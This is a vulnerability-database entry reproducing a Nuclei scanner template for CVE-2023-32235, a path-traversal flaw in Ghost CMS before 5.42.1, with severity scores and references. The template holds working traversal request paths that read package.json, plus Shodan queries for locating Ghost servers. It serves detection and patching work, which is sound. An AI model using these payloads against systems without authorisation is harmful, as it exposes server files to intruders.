Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-32235
HistoryMay 08, 2023 - 6:27 a.m.

Ghost CMS < 5.42.1 - Path Traversal

2023-05-0806:27:57
ProjectDiscovery
github.com
5
cve2023
lfi
ghostcms
node.js

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.888 High

EPSS

Percentile

98.7%

Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
id: CVE-2023-32235

info:
  name: Ghost CMS < 5.42.1 - Path Traversal
  author: j3ssie
  severity: high
  description: |
    Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: Fixed in version 5.42.1
  reference:
    - https://github.com/advisories/GHSA-wf7x-fh6w-34r6
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32235
    - https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f
    - https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32235
    cwe-id: CWE-22
    epss-score: 0.01376
    epss-percentile: 0.84873
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query:
      - http.component:"Ghost"
      - http.component:"ghost"
  tags: cve2023,cve,lfi,ghostcms,ghost,node.js

http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/built%2F..%2F..%2F/package.json"
      - "{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name"'
          - '"version"'
          - '"ghost"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009d9ed3064bcd327602a7875a9ddb31977e70e750115974413440ce5bbf1889800220730e9fb8ec81413a05f5827e7357d6c60d56eb35b55a5cbc956473a69dd9fc02:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.888 High

EPSS

Percentile

98.7%

Related for NUCLEI:CVE-2023-32235